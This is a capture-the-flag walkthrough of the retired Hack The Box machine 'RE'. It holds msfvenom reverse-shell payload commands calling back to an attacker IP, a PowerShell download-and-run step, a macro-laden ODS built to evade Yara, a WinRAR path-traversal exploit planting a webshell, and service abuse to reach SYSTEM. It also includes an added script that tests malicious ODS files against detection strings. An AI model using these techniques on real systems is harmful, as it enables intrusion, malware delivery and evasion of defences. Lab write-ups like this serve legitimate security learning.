RE: Hack The Box Walkthrough
source link: https://hackso.me/re-htb-walkthrough/
This post documents the complete walkthrough of RE, a retired vulnerable VM created by 0xdf, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Background
RE is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports on the host.
```
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.144 --rate=1000

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-07-22 08:11:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.144
Discovered open port 80/tcp on 10.10.10.144
```
masscan finds two open ports. Let's do one better with nmap, scanning the discovered ports to establish their services.
```
# nmap -n -v -Pn -p80,445 -A --reason -oN nmap.txt 10.10.10.144
...
PORT    STATE SERVICE       REASON          VERSION
80/tcp  open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Visit reblog.htb
445/tcp open  microsoft-ds? syn-ack ttl 127
```
Hmm. Nothing much from nmap. But since SMB is enabled, let's see what we can discover from smbmap.
Well, at least there's a directory malware_dropbox we can read. Too bad it doesn’t have any files in it.
Time to check out the http service. Here’s what it looks like.
I better put reblog.htb into /etc/hosts.
Looks like there's one more host to add to /etc/hosts. And, check out the HTML source of re.htb.
Is that a hint of privilege escalation? I've no clue how to proceed up to this point. Perhaps we can glean some insights from the blog posts?
Custom ODS and Evading Yara Detection
Two blog posts in reblog.htb hinted about possible evasion of Yara detection with ODS phishing. One of the links pointed to the creator’s external blog, where we can catch a glimpse of the Yara rules and how we can evade detection of malicious ODS files.
In addition, this post mentions the detection of run-of-the-mill stuff, particularly powershell and cmd.exe. Something for us to keep in mind while creating the custom ODS.
But where is the dropbox? Recall the malware_dropbox share? Although it says read-only, smbclient can actually put files into it.
I followed the steps in the creator’s blog to generate an ODS file from Metasploit and then changed the names of the subroutines and functions in the LibreOffice macro editor like so.
Well, my payload dick.jar is a reverse shell written in Java generated by msfvenom. The box must have the Java Runtime Environment (JRE) installed, right, because of Kenny in IT.
```
# msfvenom -p java/shell_reverse_tcp LHOST=10.10.15.203 LPORT=1234 -f jar -o dick.jar
Payload size: 7548 bytes
Final size of jar file: 7548 bytes
Saved as: dick.jar
```
We host the file with Python’s SimpleHTTPServer module. Upon opening the ODS file, the macro will download the payload with certutil.exe and write it to c:\windows\tracing\dick.jar, a place where Everyone has write access. Next, we put in a new ODS file to execute the reverse shell.
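The post notes that the dropped ODS is unpacked and scanned with Yara on the target before it is opened, and that the rules flag run-of-the-mill strings such as powershell and cmd.exe. The script below is an added example, not code from the post or from the box: a pre-flight check that unpacks a candidate ODS the same way the target does (copy to .zip, then Expand-Archive, since an ODS is an ordinary zip container) and greps every extracted file for those strings before the file is put into malware_dropbox. The pattern list is a partial assumption, because the full rule set is not on this page; the script name Check-Ods.ps1 used in the usage note is also assumed.

```powershell
# Added example (not from the original post): pre-flight check that mimics
# what the target does to each dropped ODS (copy to .zip, unpack, scan) so a
# custom macro can be tested for the strings the post says the Yara rules flag
# ("powershell" and "cmd.exe") before it is uploaded. The full rule set is not
# on this page, so the default pattern list is a partial assumption.
param(
    [Parameter(Mandatory = $true)][string]$OdsPath,
    [string[]]$FlaggedStrings = @('powershell', 'cmd.exe')
)

$ErrorActionPreference = 'Stop'

# An ODS file is an ordinary zip container. Expand-Archive insists on a .zip
# extension, which is why the copy-to-.zip step is needed.
$full     = (Resolve-Path $OdsPath).Path
$zipPath  = [System.IO.Path]::ChangeExtension($full, '.zip')
$unzipDir = Join-Path ([System.IO.Path]::GetDirectoryName($full)) `
                      ([System.IO.Path]::GetFileNameWithoutExtension($full))

Copy-Item -Path $full -Destination $zipPath -Force
New-Item -Force -ItemType Directory -Path $unzipDir | Out-Null
Expand-Archive -Path $zipPath -DestinationPath $unzipDir -Force

# Yara is run recursively over the whole unpacked tree, so every file counts,
# not only the Basic module source under Basic\<Library>\<Module>.xml.
# Select-String is case-insensitive by default, which is the safe assumption
# for a rule we have not seen in full.
$pattern = ($FlaggedStrings | ForEach-Object { [regex]::Escape($_) }) -join '|'
$hits = Get-ChildItem -Path $unzipDir -Recurse -File |
    Select-String -Pattern $pattern |
    Select-Object Path, LineNumber, Line

if ($hits) {
    Write-Host "[-] $full would be deleted by the sandbox:"
    $hits | ForEach-Object {
        Write-Host ("    {0}:{1}: {2}" -f $_.Path, $_.LineNumber, $_.Line.Trim())
    }
} else {
    Write-Host "[+] $full contains none of the flagged strings"
}

# Clean up the working copies.
Remove-Item -Recurse -Force -Path $unzipDir, $zipPath
```

Run it as `.\Check-Ods.ps1 -OdsPath .\payload.ods` (or `pwsh ./Check-Ods.ps1 -OdsPath ./payload.ods` on Kali); add `-FlaggedStrings` to extend the list as more of the rule set becomes known. A macro that calls certutil.exe and java directly, as described above, produces no hit for the two default strings, which is the point of the evasion.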
We should get a reverse shell if nothing goes wrong.
Sweet. The user.txt is on luke’s desktop.
Privilege Escalation
During enumeration of luke's account, I noticed a scheduled task running process_samples.ps1 under luke's privileges.
```powershell
$process_dir = "C:\Users\luke\Documents\malware_process"
$files_to_analyze = "C:\Users\luke\Documents\ods"
$yara = "C:\Users\luke\Documents\yara64.exe"
$rule = "C:\Users\luke\Documents\ods.yara"

while($true) {
    # Get new samples
    move C:\Users\luke\Documents\malware_dropbox\* $process_dir

    # copy each ods to zip file
    Get-ChildItem $process_dir -Filter *.ods | Copy-Item -Destination {$_.fullname -replace ".ods", ".zip"}

    Get-ChildItem $process_dir -Filter *.zip | ForEach-Object {
        # unzip archive to get access to content
        $unzipdir = Join-Path $_.directory $_.Basename
        New-Item -Force -ItemType directory -Path $unzipdir | Out-Null
        Expand-Archive $_.fullname -Force -ErrorAction SilentlyContinue -DestinationPath $unzipdir

        # yara to look for known malware
        $yara_out = & $yara -r $rule $unzipdir
        $ods_name = $_.fullname -replace ".zip", ".ods"
        if ($yara_out.length -gt 0) {
            Remove-Item $ods_name
        }
    }

    # if any ods files left, make sure they launch, and then archive:
    $files = ls $process_dir\*.ods
    if ( $files.length -gt 0) {
        # launch ods files
        Invoke-Item "C:\Users\luke\Documents\malware_process\*.ods"
        Start-Sleep -s 5

        # kill open office, sleep
        Stop-Process -Name soffice*
        Start-Sleep -s 5

        #& 'C:\Program Files (x86)\WinRAR\Rar.exe' a -ep $process_dir\temp.rar $process_dir\*.ods 2>&1 | Out-Null
        Compress-Archive -Path "$process_dir\*.ods" -DestinationPath "$process_dir\temp.zip"
        $hash = (Get-FileHash -Algorithm MD5 $process_dir\temp.zip).hash

        # Upstream processing may expect rars. Rename to .rar
        Move-Item -Force -Path $process_dir\temp.zip -Destination $files_to_analyze\$hash.rar
    }

    Remove-Item -Recurse -force -Path $process_dir\*
    Start-Sleep -s 5
}
```
At the bottom of the script, there's mention of upstream processing of RAR files. I noticed any RAR file I put into C:\users\luke\Documents\ods disappears faster than I can blink my eye while I was staring at my screen. Long story short, I was able to use the EvilWinRar generator to exploit CVE-2018-20250 to write files as re/cam. But, what files do I write and where?
Recall the web server is IIS? In C:\inetpub\wwwroot, there are three folders, blog, ip and re, where luke has no write access. I can probably use EvilWinRar to write an ASPX webshell (from /usr/share/webshells/aspx/cmdasp.aspx in Kali Linux) to one of the folders.
Download the webshell.rar to C:\users\luke\Documents\ods like so.
```
C:\Users\luke\Documents\ods>powershell -nop -exec bypass -c iwr http://10.10.15.203:8000/webshell.rar -outfile .\webshell.rar
```
Bam, a webshell as IIS service.
Weak Service
I found out that accesschk.exe was installed as part of SysInternals during my enumeration earlier on. Using accesschk.exe, I was able to determine that NT AUTHORITY\SERVICE has full service access to UsoSvc.
Holy cow. I can change it to run a reverse shell as SYSTEM!
I should mention that I had previously written nc.exe to C:\inetpub\wwwroot\re with EvilWinRar, in case you are wondering how I can run a reverse shell back.
With a SYSTEM shell, getting root.txt should be a breeze.
Not so fast. I need to impersonate coby. As SYSTEM, you can be anyone you want on the machine with ease using Meterpreter and the incognito extension. First, I generate Meterpreter with msfvenom.
```
# msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=10.10.15.203 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 650 bytes
Final size of exe file: 7168 bytes
Saved as: met.exe
```
Next, stand by Metasploit’s multi-handler and wait for Meterpreter.
Launch a shell as coby and read that root.txt.